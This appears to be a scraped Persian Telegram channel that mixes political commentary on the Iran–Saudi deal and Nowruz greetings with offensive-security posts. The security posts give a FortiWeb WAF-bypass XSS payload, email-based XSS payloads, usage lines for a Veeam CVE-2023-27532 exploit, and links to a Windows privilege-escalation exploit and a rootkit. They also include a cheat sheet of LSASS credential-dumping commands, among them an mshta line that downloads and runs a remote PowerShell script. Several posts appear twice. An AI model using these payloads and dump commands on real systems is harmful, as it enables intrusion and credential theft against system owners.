🌐 داستان توافق ایران و عربستان با دستور چین
1. از چند ماه قبل چین تصمیم گرفت که یک تلنگر جدی به رهبری ایران بدهد تا از خواب و خیال بیدار شوند و پایبند به روابط بین المللی شوند و محل تامین انرژی چین یعنی خلیج فارس را محل خطر و جنگ قومی، قبیله ای نکنند.
2. رئیس جمهور چین به عربستان می رود قراردادهای استراتژیک و حیاتی با عربستان می بندد و برای آنکه آنها را خوشحال کند، اعلام می کند که ایران در کشورهای منطقه دخالت نکند، جنگ افروزی نکند، 3 جزیره را نیز بیاید مسئله اش را با اعراب حل کند.
3. جمهوری اسلامیِ عصبانی دید پشتش خالی شد به چین پیام می دهد پس پیمان شانگهای، قرارداد 25 ساله چه شد؟
4. چین در پاسخ به ایران تفهیم می کند اینها مقدمات همان قراردادها است و وزیر خارجه خود را سریع به ایران می فرست تا دلجویی کند و از رئیسی دعوت کند بیاید چین تا او را در مورد تحولات بین المللی که قرار است اتفاق بیافتد توجیه کند.
5. در سفر رئیسی تذکرات جدی به رهبری داده می شود که قرار است آمریکا و اروپا در شورای حکام یک قطعنامه قوی بر علیه غنی سازی 60 درصدی اورانیم و عدم تمکین ایران از تعهدات نسبت به آژانس بین المللی انرژی اتمی، صادر کند. در چنین صورت و در ادامه پرونده ایران را به شورای امنیت می برد و. ...
6. چین به رئیسی می فهماند که قضیه جدی است و برود و آقای خامنه ای را در جریان آنچه قطعناً بر سر ایران خواهد آمد بگذارد. اگر دست از غنی سازی بر ندارد، روی حمایت چین حساب نکند. در ضمن چین به رهبری اجازه نخواهد داد که ایران با جنگ با عربستان و یا حمله به مراکز تامین انرژی چین در خلیج فارس هیچ کاری را بکند و به شدت جلوی آن کار را خواهد گرفت زیرا به حیات چین و برنامه های توسعه ای چین لطمه جدی خواهد خورد.
6. در ضمن به رئیسی گفتند سریع با آژانس انرژی اتمی مسائل تان را حل کنید و چین نیز زمینه صلح و دوستی بین ایران و عربستان و سپس ایران با جهان اعراب را تامین وتضمین می کند.
7. رهبری سریع دستور داد از گروسی دعوت کنید و امتیاز بدهید و بدون درخواست از رفع تحریم از غرب و آمریکا و گذاشتن شرط برای این کار، از شرط و شروط گذشت و گروسی به ایران آمد و اینها نیز با او به توافق رسیدند. البته شرط گروسی به آمدن به ایران دیدار با رئیسی رئیس جمهور برای گرفتن تعهد در اجرای تفاهمنامه بود تا بعداً ایران زیر قول و قرار نزند و او بتواند در گزارش رسمی به آژانس انرژی اتمی و متقاعد کردن آنها در جلوگیری از صدور قطعنامه بر علیه ایران تلاش کند.
8. آمریکا و اروپا از صدور قطعنامه بر علیه ایران در جلسه دو روز گذشته شورای حکام صرف نظر کردند. آمریکا مدعی شد منتظر اجرای عملی و سریع و قولی که ایران داده است می ماند تا متقاعد شود و دو باره ایران بازی در نیاورد.
9. همچنین خبرهایی می رسد که ایران قصد دارد زندانیان آمریکایی و سایر کشورهای اروپایی را آزاد کند.
10. پس از این نرمش قهرمانانه، جمهوری اسلامی ایران و چین در نشست هفته گذشته در سازمان ملل متحد در مورد حمله روسیه به اکراین رای ممتنع می دهند. و سپس رهبری بعنوان فرمانده کل قوا تصمیم می گیرند که هیچ موشک بالستیک برای حمایت از روسیه به جنگ در اکراین ارسال نکنند. همچنین انگلستان رسما اعلام می کند که هیچ پهباد ایرانی پس از 4 فوریه به بعد در جنگ اکراین شرکت نداشته است.
11. یعنی ایران دو تصمیم عاقلانه و همزمان گرفت :
الف) دست از حمایت روسیه در جنگ با اکراین برداشت.
ب) دست از لج بازی در غنی سازی اورانیم کشید و به انجام تعهدات خود به آژانس انرژی اتمی بدون گذاشتن هیچ شرطی برگشت.
12. یعنی جمهوری اسلامی وقتی خطر جدی و زور پر زور را بفهمد حاضر است نرمش قهرمانانه کند و حتی با وهابی های تند رو ضد شیعه نیز می توان به تفاهم رسید، همانطور که با طالبان و القاعده می توان همکاری نمود.
13. چین کمونیست برای حفظ منافع ملی کشورش عمل کرد و هیچگاه عاشق دو کشور تند رو مذهبی، اسلامی و قبیله ای نظیر عربستان وهابی و جمهوری اسلامی شیعی تندرو نیست. ولی برای حفظ جریان نفت و انرژی از خلیج فارس این دو دشمن را می خواهد در زیر لوای خویش به دو تا دوست با هم و البته مشترک با چین ابرقدرت تبدیل کند.
در مجموع کار بسیار خوبی انجام داد و جلوی یک جنگ و خونریزی دیگر در منطقه را که از طرف دشمنان و بخصوص اسرائیل ترویج می شد را گرفت
14. بصیرت اقتضا می کرد که از سال ها قبل به نصایح صالحان و دلسوزان جمهوری اسلامی گوش می دادند و فرصت سوزی نمی کردند و در زمان های مناسب قبلی با گرفتن امتیازات خوب به نفع مردم ایران عمل می کردند و شرایط کشور را به حالت بحران و سقوط نمی بردند تا مجبور نمی شدند که نرمش قهرمانانه کنند. در هر صورت خدا کند به این تفاهمات پایبند باشند و نفعی نیز به مردم ایران برسد و خدعه ای در کار نباشد.
✍ دکتر تقی کیمیایی اسدی
@pfksecurity
1. از چند ماه قبل چین تصمیم گرفت که یک تلنگر جدی به رهبری ایران بدهد تا از خواب و خیال بیدار شوند و پایبند به روابط بین المللی شوند و محل تامین انرژی چین یعنی خلیج فارس را محل خطر و جنگ قومی، قبیله ای نکنند.
2. رئیس جمهور چین به عربستان می رود قراردادهای استراتژیک و حیاتی با عربستان می بندد و برای آنکه آنها را خوشحال کند، اعلام می کند که ایران در کشورهای منطقه دخالت نکند، جنگ افروزی نکند، 3 جزیره را نیز بیاید مسئله اش را با اعراب حل کند.
3. جمهوری اسلامیِ عصبانی دید پشتش خالی شد به چین پیام می دهد پس پیمان شانگهای، قرارداد 25 ساله چه شد؟
4. چین در پاسخ به ایران تفهیم می کند اینها مقدمات همان قراردادها است و وزیر خارجه خود را سریع به ایران می فرست تا دلجویی کند و از رئیسی دعوت کند بیاید چین تا او را در مورد تحولات بین المللی که قرار است اتفاق بیافتد توجیه کند.
5. در سفر رئیسی تذکرات جدی به رهبری داده می شود که قرار است آمریکا و اروپا در شورای حکام یک قطعنامه قوی بر علیه غنی سازی 60 درصدی اورانیم و عدم تمکین ایران از تعهدات نسبت به آژانس بین المللی انرژی اتمی، صادر کند. در چنین صورت و در ادامه پرونده ایران را به شورای امنیت می برد و. ...
6. چین به رئیسی می فهماند که قضیه جدی است و برود و آقای خامنه ای را در جریان آنچه قطعناً بر سر ایران خواهد آمد بگذارد. اگر دست از غنی سازی بر ندارد، روی حمایت چین حساب نکند. در ضمن چین به رهبری اجازه نخواهد داد که ایران با جنگ با عربستان و یا حمله به مراکز تامین انرژی چین در خلیج فارس هیچ کاری را بکند و به شدت جلوی آن کار را خواهد گرفت زیرا به حیات چین و برنامه های توسعه ای چین لطمه جدی خواهد خورد.
6. در ضمن به رئیسی گفتند سریع با آژانس انرژی اتمی مسائل تان را حل کنید و چین نیز زمینه صلح و دوستی بین ایران و عربستان و سپس ایران با جهان اعراب را تامین وتضمین می کند.
7. رهبری سریع دستور داد از گروسی دعوت کنید و امتیاز بدهید و بدون درخواست از رفع تحریم از غرب و آمریکا و گذاشتن شرط برای این کار، از شرط و شروط گذشت و گروسی به ایران آمد و اینها نیز با او به توافق رسیدند. البته شرط گروسی به آمدن به ایران دیدار با رئیسی رئیس جمهور برای گرفتن تعهد در اجرای تفاهمنامه بود تا بعداً ایران زیر قول و قرار نزند و او بتواند در گزارش رسمی به آژانس انرژی اتمی و متقاعد کردن آنها در جلوگیری از صدور قطعنامه بر علیه ایران تلاش کند.
8. آمریکا و اروپا از صدور قطعنامه بر علیه ایران در جلسه دو روز گذشته شورای حکام صرف نظر کردند. آمریکا مدعی شد منتظر اجرای عملی و سریع و قولی که ایران داده است می ماند تا متقاعد شود و دو باره ایران بازی در نیاورد.
9. همچنین خبرهایی می رسد که ایران قصد دارد زندانیان آمریکایی و سایر کشورهای اروپایی را آزاد کند.
10. پس از این نرمش قهرمانانه، جمهوری اسلامی ایران و چین در نشست هفته گذشته در سازمان ملل متحد در مورد حمله روسیه به اکراین رای ممتنع می دهند. و سپس رهبری بعنوان فرمانده کل قوا تصمیم می گیرند که هیچ موشک بالستیک برای حمایت از روسیه به جنگ در اکراین ارسال نکنند. همچنین انگلستان رسما اعلام می کند که هیچ پهباد ایرانی پس از 4 فوریه به بعد در جنگ اکراین شرکت نداشته است.
11. یعنی ایران دو تصمیم عاقلانه و همزمان گرفت :
الف) دست از حمایت روسیه در جنگ با اکراین برداشت.
ب) دست از لج بازی در غنی سازی اورانیم کشید و به انجام تعهدات خود به آژانس انرژی اتمی بدون گذاشتن هیچ شرطی برگشت.
12. یعنی جمهوری اسلامی وقتی خطر جدی و زور پر زور را بفهمد حاضر است نرمش قهرمانانه کند و حتی با وهابی های تند رو ضد شیعه نیز می توان به تفاهم رسید، همانطور که با طالبان و القاعده می توان همکاری نمود.
13. چین کمونیست برای حفظ منافع ملی کشورش عمل کرد و هیچگاه عاشق دو کشور تند رو مذهبی، اسلامی و قبیله ای نظیر عربستان وهابی و جمهوری اسلامی شیعی تندرو نیست. ولی برای حفظ جریان نفت و انرژی از خلیج فارس این دو دشمن را می خواهد در زیر لوای خویش به دو تا دوست با هم و البته مشترک با چین ابرقدرت تبدیل کند.
در مجموع کار بسیار خوبی انجام داد و جلوی یک جنگ و خونریزی دیگر در منطقه را که از طرف دشمنان و بخصوص اسرائیل ترویج می شد را گرفت
14. بصیرت اقتضا می کرد که از سال ها قبل به نصایح صالحان و دلسوزان جمهوری اسلامی گوش می دادند و فرصت سوزی نمی کردند و در زمان های مناسب قبلی با گرفتن امتیازات خوب به نفع مردم ایران عمل می کردند و شرایط کشور را به حالت بحران و سقوط نمی بردند تا مجبور نمی شدند که نرمش قهرمانانه کنند. در هر صورت خدا کند به این تفاهمات پایبند باشند و نفعی نیز به مردم ایران برسد و خدعه ای در کار نباشد.
✍ دکتر تقی کیمیایی اسدی
@pfksecurity
افزایش دسترسی در ویندوز 7/8/10 از طریق Atom Table Hijacking
https://github.com/SleepTheGod/Windows-Atom-Table-Hijacking
#PrivEsc
@pfksecurity
https://github.com/SleepTheGod/Windows-Atom-Table-Hijacking
#PrivEsc
@pfksecurity
GitHub
GitHub - SleepTheGod/Windows-Atom-Table-Hijacking: A privilege escalation vulnerability exists in Windows due to a flaw in the…
A privilege escalation vulnerability exists in Windows due to a flaw in the implementation of the Atom Table. An attacker could exploit this vulnerability by injecting malicious code into the Atom ...
ScrubCrypt - The Rebirth of Jlaive
https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/scrubcrypt-the-rebirth-of-jlaive
#malware
@PfkSecurity
https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/scrubcrypt-the-rebirth-of-jlaive
#malware
@PfkSecurity
با درود خدمت هم میهنان عزیزم - آغاز سال نو ۲۵۸۲ شاهنشاهی
فرا رسیدن نوروز باستانی را به شما شاد باش می گویم !
سال گذشته، سالی بود که مردم ایران با تلاشی بیوقفه، برای تحقق آرمان هایشان به دنبال آزادی در مقابل یک رژیم ستمگر و جنایتکار مبارزه کردند. در این سال، با حضور شجاع و پرافتخار زنان ایران، حماسه ای بزرگ به نام زن، به نام زندگی و به نام آزادی، شکل گرفت و مردم ایران توانستند با پایداری و استقامت خود، برای تحقق این آرمان ها به مبارزه بپردازند.
شما به دنبال رهایی میهنتان از دست رژیم ظالمانهای هستید که مردم را به فقر و بیعدالتی محکوم میکند. این راه نیز پر از مخاطرات و تلاشهای فراوانی است، اما شما با ثابت قدمی و انگیزهی بالا، به هدف نهایی خود نزدیک خواهیم شد.
فراموش نکنید که یاد جانباختگان میهن، تابناکترین چراغ برای ماست. آنها همیشه در قلب و خاطر ما هستند و باعث ایجاد انگیزه و شور در ما میشوند. در این سال جدید، بار دیگر از شما میخواهیم که پشتیبان خانوادههایی باشید که عزیزان خود را از دست دادهاند.
با آرزوی بهترین ها برای همگان، برای ایران و مردمش، این سال را با امید به آینده به دست خواهیم آورد و با همبستگی و وحدت، به دنبال نابودی رژیم ضحاک خواهیم رفت.
- کاوه
پاینده باشید!
نوروزتان شاد .
@PfkSecurity
فرا رسیدن نوروز باستانی را به شما شاد باش می گویم !
سال گذشته، سالی بود که مردم ایران با تلاشی بیوقفه، برای تحقق آرمان هایشان به دنبال آزادی در مقابل یک رژیم ستمگر و جنایتکار مبارزه کردند. در این سال، با حضور شجاع و پرافتخار زنان ایران، حماسه ای بزرگ به نام زن، به نام زندگی و به نام آزادی، شکل گرفت و مردم ایران توانستند با پایداری و استقامت خود، برای تحقق این آرمان ها به مبارزه بپردازند.
شما به دنبال رهایی میهنتان از دست رژیم ظالمانهای هستید که مردم را به فقر و بیعدالتی محکوم میکند. این راه نیز پر از مخاطرات و تلاشهای فراوانی است، اما شما با ثابت قدمی و انگیزهی بالا، به هدف نهایی خود نزدیک خواهیم شد.
فراموش نکنید که یاد جانباختگان میهن، تابناکترین چراغ برای ماست. آنها همیشه در قلب و خاطر ما هستند و باعث ایجاد انگیزه و شور در ما میشوند. در این سال جدید، بار دیگر از شما میخواهیم که پشتیبان خانوادههایی باشید که عزیزان خود را از دست دادهاند.
با آرزوی بهترین ها برای همگان، برای ایران و مردمش، این سال را با امید به آینده به دست خواهیم آورد و با همبستگی و وحدت، به دنبال نابودی رژیم ضحاک خواهیم رفت.
- کاوه
پاینده باشید!
نوروزتان شاد .
@PfkSecurity
🎁 عیدی ما به شما
آماده سازی OSWE/AWAE
این پست شامل تمام آموزش ها و آموزش هایی است که می تواند برای گواهینامه OSWE امنیت تهاجمی مفید باشد.
Course Syllabus:
https://www.offensive-security.com/documentation/awae-syllabus.pdf
به زودی در کانال قرار میگیرد این پست منتظر باشید ...
#web
#exploitdev
#OSWE
@pfksecurity
آماده سازی OSWE/AWAE
این پست شامل تمام آموزش ها و آموزش هایی است که می تواند برای گواهینامه OSWE امنیت تهاجمی مفید باشد.
Course Syllabus:
https://www.offensive-security.com/documentation/awae-syllabus.pdf
به زودی در کانال قرار میگیرد این پست منتظر باشید ...
#web
#exploitdev
#OSWE
@pfksecurity
بای پس برای FortiWeb (Fortinet) WAF
استفاده:
یعنی به جای بارگذاری استاندارد XSS برای اجرای js
#waf #Bypass
@Pfksecurity
استفاده:
"><iframe src=//14.rs>یعنی به جای بارگذاری استاندارد XSS برای اجرای js
#waf #Bypass
@Pfksecurity
kernel-linux-factory
راحت است زیرا نیازی به کامپایل یا تنظیم محیط ندارید، من به این نگاه کردم که کدام کرنل، یک splot راه اندازی کرد.
به عنوان بخشی از اکسپلویت برای:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918
download
#linux
#exploits
#kernel
@PfkSecurity
راحت است زیرا نیازی به کامپایل یا تنظیم محیط ندارید، من به این نگاه کردم که کدام کرنل، یک splot راه اندازی کرد.
به عنوان بخشی از اکسپلویت برای:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918
download
#linux
#exploits
#kernel
@PfkSecurity
GitHub
GitHub - bsauce/kernel-exploit-factory: Linux kernel CVE exploit analysis report and relative debug environment. You don't need…
Linux kernel CVE exploit analysis report and relative debug environment. You don't need to compile Linux kernel and configure your environment anymore. - GitHub - bsauce/kernel-exploit-fac...
درباره Payloads در ایمیل
موضوع جدید نیست، اما همچنان مرتبط است. یکی از محبوب ترین آسیب پذیری های آدرس ایمیل، به نظر من، XSS است. طبق RFC822، پیلود را می توان به این صورت وارد کرد:
…
در اینجا می توانید بررسی کنید که آیا ایمیل شما درست است یا خیر. علاوه بر XSS، می توانید به دنبال آسیب پذیری های دیگری مانند SQLi، SSTI، RCE نیز باشید. من در اینجا با جزئیات بیشتری در مورد این صحبت کردم.
ممکن است این سوال پیش بیاید، اما چگونه می توان از سایت به چنین آدرسی ثبت نام کرد و پیام دریافت کرد؟ میتوانید سرور ایمیل خود را راهاندازی کنید یا آن را آسانتر انجام دهید و از Burp Collaborator استفاده کنید. همه ایمیلهای زیر معتبر هستند و به Burp Collab شما پیام ارسال میکنند (به جای xxxx.oastify.com با ایمیل شما):
#xss
#rce
#sqli
#ssti
@PfkSecurity
موضوع جدید نیست، اما همچنان مرتبط است. یکی از محبوب ترین آسیب پذیری های آدرس ایمیل، به نظر من، XSS است. طبق RFC822، پیلود را می توان به این صورت وارد کرد:
"payload"@domain.com
name@"payload"domain.com
name(payload)@domain.com
name@(payload)domain.com
name@domain.com(payload)…
در اینجا می توانید بررسی کنید که آیا ایمیل شما درست است یا خیر. علاوه بر XSS، می توانید به دنبال آسیب پذیری های دیگری مانند SQLi، SSTI، RCE نیز باشید. من در اینجا با جزئیات بیشتری در مورد این صحبت کردم.
ممکن است این سوال پیش بیاید، اما چگونه می توان از سایت به چنین آدرسی ثبت نام کرد و پیام دریافت کرد؟ میتوانید سرور ایمیل خود را راهاندازی کنید یا آن را آسانتر انجام دهید و از Burp Collaborator استفاده کنید. همه ایمیلهای زیر معتبر هستند و به Burp Collab شما پیام ارسال میکنند (به جای xxxx.oastify.com با ایمیل شما):
mail@xxxx.oastify.com
mail(<noscript>alert(0)</noscript>)@xxxx.oastify.com
"<img/src/onerror=alert(0)>"@xxxx.oastify.com
#web #xss
#rce
#sqli
#ssti
@PfkSecurity
CVE-2023-27532
بله، دوباره Veeam Backup & Replication
نشت حساب ها در متن ساده یا اجرای دستور از راه دور.
https://attackerkb.com/topics/ALUsuJioE5/cve-2023-27532/rapid7-analysis
POC exploit
usage:
#rce
#leakPass
@Pfksecurity
بله، دوباره Veeam Backup & Replication
نشت حساب ها در متن ساده یا اجرای دستور از راه دور.
https://attackerkb.com/topics/ALUsuJioE5/cve-2023-27532/rapid7-analysis
POC exploit
usage:
VeeamHax.exe --target 192.168.0.100
OrVeeamHax.exe --target 192.168.0.100 --cmd calc.exe
#veeam #rce
#leakPass
@Pfksecurity
در سال 2023 ویندوز 11 AMSI را به خطر بیاندازید و بایپس کنید .
همچون(به عنوان) یک محقق امنیتی و مشتاق تیم قرمز، من همیشه مجذوب عملکرد درونی نرم افزار آنتی ویروس و سایر اقدامات امنیتی طراحی شده برای نگهداری از سیستم های رایانه ای بوده ام. بتازگی، چالش دور زدن رابط اسکن ضد بدافزار (AMSI) در ویندوز را برای خودم قرار دادم، یک ویژگی امنیتی که از زمان معرفی تیمهای قرمز و مهاجمان را به دردسر انداخته است.
پس از ساعتهای بیشماری تحقیق، آزمایش و آزمون و خطا، سرانجام در سال 2023 موفق شدم AMSI را دور بزنم. در این داستان، تکنیکها و روشهایی را که برای انجام این شاهکار استفاده کردم را با شما به اشتراک میگذارم. از درک اصول اساسی AMSI تا تجزیه و تحلیل نقاط ضعف آن، من شرح گسترده از مراحلی که منجر به دور زدن موفقیت آمیز من شد ارائه خواهم کرد.
امیدوارم از طریق این داستان، چالشها و پیش آمدهایی را که با تیم قرمز به وجود میآیند، و همچنین اهمیت استفاده مسئولانه و اخلاقی از مهارتها و دانش، روشن کنم. بنابراین، دست و پنجه نرم کنید و در این سفر هیجان انگیز به دنیای دور زدن AMSI به من بپیوندید!
در تلاشم برای دور زدن AMSI، با ابزارهای C2 مانند Cobalt Strike، Sliver و Havoc C2 برخورد کردم. این ابزارها با قابلیت های خود مرا تحت تأثیر قرار دادند و بینش های ارزشمندی را در مورد نهش (وضعیت) فعلی سیستم های امنیتی ارائه کردند. از طریق کاوش در این ابزارها، به درک عمیق تری از نحوه تفکر و عملکرد مهاجمان دست یافتم که در آزمایش و تحقیق امنیتی مشروع من مفید واقع شده است.
Shellcodes
شل کدها به یک قطعه کد کوچک اشاره دارد که به عنوان اصطلاحا محموله یا ( پیلود ) در یک اکسپلویت یا حمله استفاده می شود. این برنامه به گونه ای طراحی شده است که مستقیماً در حافظه اجرا شود و می توان از آن برای کنترل یک سیستم تارگت، افزایش دسترسی ها یا انجام سایر اقدامات مخرب استفاده کرد.
برای پروژهام، استفاده از پیلود Sliver را انتخاب کردم زیرا سطح بالایی از مخفی کاری را ارائه میداد و به من اجازه میداد تا از اقدامات امنیتی مختلف عبور کنم. Sliver یک ابزار محبوب C2 است که می تواند برای اهداف مختلفی از جمله تست نفوذ، تیم قرمز و سایر فعالیت های مرتبط با امنیت استفاده شود.
ادامه دارد ...
#AMSI #Bypass
@PfkSecurity
همچون(به عنوان) یک محقق امنیتی و مشتاق تیم قرمز، من همیشه مجذوب عملکرد درونی نرم افزار آنتی ویروس و سایر اقدامات امنیتی طراحی شده برای نگهداری از سیستم های رایانه ای بوده ام. بتازگی، چالش دور زدن رابط اسکن ضد بدافزار (AMSI) در ویندوز را برای خودم قرار دادم، یک ویژگی امنیتی که از زمان معرفی تیمهای قرمز و مهاجمان را به دردسر انداخته است.
پس از ساعتهای بیشماری تحقیق، آزمایش و آزمون و خطا، سرانجام در سال 2023 موفق شدم AMSI را دور بزنم. در این داستان، تکنیکها و روشهایی را که برای انجام این شاهکار استفاده کردم را با شما به اشتراک میگذارم. از درک اصول اساسی AMSI تا تجزیه و تحلیل نقاط ضعف آن، من شرح گسترده از مراحلی که منجر به دور زدن موفقیت آمیز من شد ارائه خواهم کرد.
امیدوارم از طریق این داستان، چالشها و پیش آمدهایی را که با تیم قرمز به وجود میآیند، و همچنین اهمیت استفاده مسئولانه و اخلاقی از مهارتها و دانش، روشن کنم. بنابراین، دست و پنجه نرم کنید و در این سفر هیجان انگیز به دنیای دور زدن AMSI به من بپیوندید!
در تلاشم برای دور زدن AMSI، با ابزارهای C2 مانند Cobalt Strike، Sliver و Havoc C2 برخورد کردم. این ابزارها با قابلیت های خود مرا تحت تأثیر قرار دادند و بینش های ارزشمندی را در مورد نهش (وضعیت) فعلی سیستم های امنیتی ارائه کردند. از طریق کاوش در این ابزارها، به درک عمیق تری از نحوه تفکر و عملکرد مهاجمان دست یافتم که در آزمایش و تحقیق امنیتی مشروع من مفید واقع شده است.
Shellcodes
شل کدها به یک قطعه کد کوچک اشاره دارد که به عنوان اصطلاحا محموله یا ( پیلود ) در یک اکسپلویت یا حمله استفاده می شود. این برنامه به گونه ای طراحی شده است که مستقیماً در حافظه اجرا شود و می توان از آن برای کنترل یک سیستم تارگت، افزایش دسترسی ها یا انجام سایر اقدامات مخرب استفاده کرد.
برای پروژهام، استفاده از پیلود Sliver را انتخاب کردم زیرا سطح بالایی از مخفی کاری را ارائه میداد و به من اجازه میداد تا از اقدامات امنیتی مختلف عبور کنم. Sliver یک ابزار محبوب C2 است که می تواند برای اهداف مختلفی از جمله تست نفوذ، تیم قرمز و سایر فعالیت های مرتبط با امنیت استفاده شود.
ادامه دارد ...
#AMSI #Bypass
@PfkSecurity
P.F.K Security
#0x16 > Cobalt Strike+Sysinternals Methods: load sysinternals Procexp “File” -> “Save” Cobalt Strike+schtasks Methods: cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR "'’rundll32.exe’’ C:\windows\system32\comsvcs.dll MiniDump…
#0x28 > Manjusaka
Methods:
#0x29 >Dumpert
Methods:
#0x30 >NanoDump
Methods:
#0x31 >Spraykatz
Methods:
#0x32 >HandleKatz
Methods:
#0x33 >CallBackDump
Methods:
#0x34 > LsassSilentProcessExit
Methods:
#0x35 > AndrewSpecial
Methods:
#0x36 >Masky
Methods:
#0x37 >SharpMiniDump
Methods:
#0x38 >MiniDump
Methods:
#0x39 >LsassDumpReflectiveDll
Methods:
#0x40 >MoonSols Windows Memory Toolkit
Methods:
#lass
@PfkSecurity
Methods:
mshta.exe javanoscript:A=new ActiveXObject(“WScript.Shell”).run(“powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(‘http://:/r.ps1')",0);close(); Manjusaka lsass dump#0x29 >Dumpert
Methods:
Dumpert.exe -k lsass.exe -s -o lsass.dmp#0x30 >NanoDump
Methods:
NanoDump.exe -t [process ID] -o [output file path]#0x31 >Spraykatz
Methods:
spraykatz.exe -w -u -p --krb5i --mimikatz "sekurlsa::minidump lsass.dmp" "exit"#0x32 >HandleKatz
Methods:
HandleKatz.exe -p lsass.exe HandleKatz.exe -p lsass.exe -o [handle ID] -dump#0x33 >CallBackDump
Methods:
CallbackDump.exe -d -p#0x34 > LsassSilentProcessExit
Methods:
LsassSilentProcessExit.exe#0x35 > AndrewSpecial
Methods:
AndrewSpecial andrew.dmp!#0x36 >Masky
Methods:
.\Masky.exe /ca:’CA SERVER\CA NAME’ (/template:User) (/currentUser) (/output:./output.txt) (/debug:./debug.txt)#0x37 >SharpMiniDump
Methods:
SharpMiniDump.exe -p -o lsass.dmp#0x38 >MiniDump
Methods:
MiniDump.exe /p /o#0x39 >LsassDumpReflectiveDll
Methods:
Import-Module .\ReflectiveLsassDump.dll Invoke-ReflectivePEInjection -PEBytes (Get-Content ReflectiveLsassDump.dll -Encoding Byte) -ProcessID (Get-Process lsass).Id#0x40 >MoonSols Windows Memory Toolkit
Methods:
MoonSolsWindowsMemoryToolkit.exe Dumping->Launch DumpIt LSASS->Select the process to dump#lass
@PfkSecurity
Chaos-Rootkit
x64 ring0 windows rootkit
https://github.com/ZeroMemoryEx/Chaos-Rootkit
#rootkit
#windows
#ring0
@pfksecurity
x64 ring0 windows rootkit
https://github.com/ZeroMemoryEx/Chaos-Rootkit
#rootkit
#windows
#ring0
@pfksecurity
GitHub
GitHub - ZeroMemoryEx/Chaos-Rootkit: Now You See Me, Now You Don't
Now You See Me, Now You Don't . Contribute to ZeroMemoryEx/Chaos-Rootkit development by creating an account on GitHub.
ششم فروردین ماه #زادروز ابرمرد پاک ایران باستان، #اشوزرتشت اسپنتمان گرامی باد.💚🤍❤️
#زادروز پیامآور خرد #اشوزرتشت بزرگ آریایی شاد باد.💚🤍❤️
بشد نوروز پاک زندگانی☘️
بشد روزی که ماند جاودانی🍷
ششم روز زمان فروردین ماهی🌎
که زرتشت آمد و افروخت چراغی🔥
@PfkSecurity
#زادروز پیامآور خرد #اشوزرتشت بزرگ آریایی شاد باد.💚🤍❤️
بشد نوروز پاک زندگانی☘️
بشد روزی که ماند جاودانی🍷
ششم روز زمان فروردین ماهی🌎
که زرتشت آمد و افروخت چراغی🔥
@PfkSecurity
ﺩﺭ ﺣﺪﻭﺩ ١٩٥٠ ﺳﺎﻝ ﭘﻴﺶ، ﺭﻭﻡ ﺑﻪ ﺍﻭﺭﺷﻠﻴﻢ ﺣﻤﻠﻪ ﻛﺮﺩ، ﺁﻥ ﺷﻬﺮ ﺭﺍ ﻭﻳﺮﺍﻥ ﻛﺮﺩ ﻭ ﻣﺮﺩﻣﺎﻧﺶ ﺭﺍ ﺑﻪ ﺑﺮﺩﮔﻰ ﮔﺮﻓﺖ .
ﺣﺪﻭﺩ ٤٥ ﺗﺎ ٦٠ ﻫﺰﺍﺭ ﻧﻔﺮ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ، ﺑﺮﺍﻯ ﺳﺎﺧﺘﻦ *ﻛﻮﻟﻮﺳﻴﻮﻡ* ﺑﻪ ﻛﺎﺭﮔﺮﻓﺘﻪ ﺷﺪﻧﺪ .
ﺑﺨﺶ ﺑﺰﺭﮔﻰ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ ﺩﺭ ﺣﻴﻦ ﻛﺎﺭ ﻛﺸﺘﻪ ﺷﺪﻧﺪ .
ﻣﺮﺍﺳﻢ ﺍﻓﺘﺘﺎﺣﻴﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺎ ﻛﺸﺘﺎﺭ ٩ ﻫﺰﺍﺭ ﺣﻴﻮﺍﻥ ﻏﻴﺮﺍﻫﻠﻰ ﺑﺮﮔﺰﺍﺭ ﺷﺪ .
ﺩﺭ ﻛﻮﻟﺴﻴﻮﻡ ﺯﻧﺎﻥ ﻭ ﻣﺮﺩﺍﻥ ﺍﺯ ﻫﻢ ﺟﺪﺍ ﺑﻮﺩﻧﺪ .
ﺟﺎﻳﮕﺎﻩ ﺯﻧﺎﻥ ﺩﺭ ﻃﺒﻘﻪ ﭘﻨﺠﻢ ﺑﻮﺩ، ﻛﻪ ﺩﻳد بسیار ﺑﺪﻯ ﺑﻪ ﻣﻴﺪﺍﻥ ﺩﺍﺷﺖ .
